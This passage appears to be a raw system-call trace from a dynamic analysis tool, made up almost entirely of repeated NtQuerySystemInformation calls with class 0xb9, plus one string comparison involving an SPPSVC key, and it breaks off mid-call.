NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x58, ResultLength=0x0) [0210.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4c0, Length=0x28, ResultLength=0x0) [0210.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4c0, Length=0x28, ResultLength=0x0) [0210.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4c0, Length=0x28, ResultLength=0x0) [0210.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4c0, Length=0x28, ResultLength=0x0) [0210.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe530, Length=0x28, ResultLength=0x0) [0210.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x28, ResultLength=0x0) [0210.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x28, ResultLength=0x0) [0210.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe420, Length=0x20, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe3a0, Length=0x20, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe3a0, Length=0x20, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe3a0, Length=0x20, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x20, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe510, Length=0x20, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe490, Length=0x20, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe490, Length=0x20, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe490, Length=0x20, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe510, Length=0x20, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe490, Length=0x20, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe490, Length=0x20, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe490, Length=0x20, ResultLength=0x0) [0210.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x38, ResultLength=0x0) [0210.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe510, Length=0x20, ResultLength=0x0) [0210.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4a0, Length=0x20, ResultLength=0x0) [0210.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4a0, Length=0x20, ResultLength=0x0) [0210.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea08, Length=0x50, ResultLength=0x0) [0210.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe930, Length=0x38, ResultLength=0x0) [0210.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x28, ResultLength=0x0) [0210.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x28, ResultLength=0x0) [0210.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x28, ResultLength=0x0) [0210.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe760, Length=0x28, ResultLength=0x0) [0210.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7d0, Length=0x28, ResultLength=0x0) [0210.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe930, Length=0x38, ResultLength=0x0) [0210.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe850, Length=0x28, ResultLength=0x0) [0210.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe850, Length=0x28, ResultLength=0x0) [0210.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe930, Length=0x38, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x20, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe730, Length=0x20, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe730, Length=0x20, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe730, Length=0x20, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe930, Length=0x38, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x20, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe740, Length=0x20, ResultLength=0x0) [0210.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe740, Length=0x20, ResultLength=0x0) [0210.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8b0, Length=0x50, ResultLength=0x0) [0210.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7e0, Length=0x38, ResultLength=0x0) [0210.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe610, Length=0x28, ResultLength=0x0) [0210.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe610, Length=0x28, ResultLength=0x0) [0210.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe610, Length=0x28, ResultLength=0x0) [0210.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe610, Length=0x28, ResultLength=0x0) [0210.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x28, ResultLength=0x0) [0210.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7e0, Length=0x38, ResultLength=0x0) [0210.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x28, ResultLength=0x0) [0210.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x28, ResultLength=0x0) [0210.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7e0, Length=0x38, ResultLength=0x0) [0210.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe660, Length=0x20, ResultLength=0x0) [0210.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x20, ResultLength=0x0) [0210.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x20, ResultLength=0x0) [0210.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x20, ResultLength=0x0) [0210.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7e0, Length=0x38, ResultLength=0x0) [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe660, Length=0x20, ResultLength=0x0) [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x20, ResultLength=0x0) [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x20, ResultLength=0x0) [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.135] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe898, Length=0x50, ResultLength=0x0) [0210.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7c0, Length=0x38, ResultLength=0x0) [0210.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x28, ResultLength=0x0) [0210.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x28, ResultLength=0x0) [0210.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x28, ResultLength=0x0) [0210.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe660, Length=0x28, ResultLength=0x0) [0210.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7c0, Length=0x38, ResultLength=0x0) [0210.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6e0, Length=0x28, ResultLength=0x0) [0210.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6e0, Length=0x28, ResultLength=0x0) [0210.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7c0, Length=0x38, ResultLength=0x0) [0210.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x20, ResultLength=0x0) [0210.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0210.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0210.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0210.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.144] NtQuerySystemInformation (SystemInformationClass=0xb9, 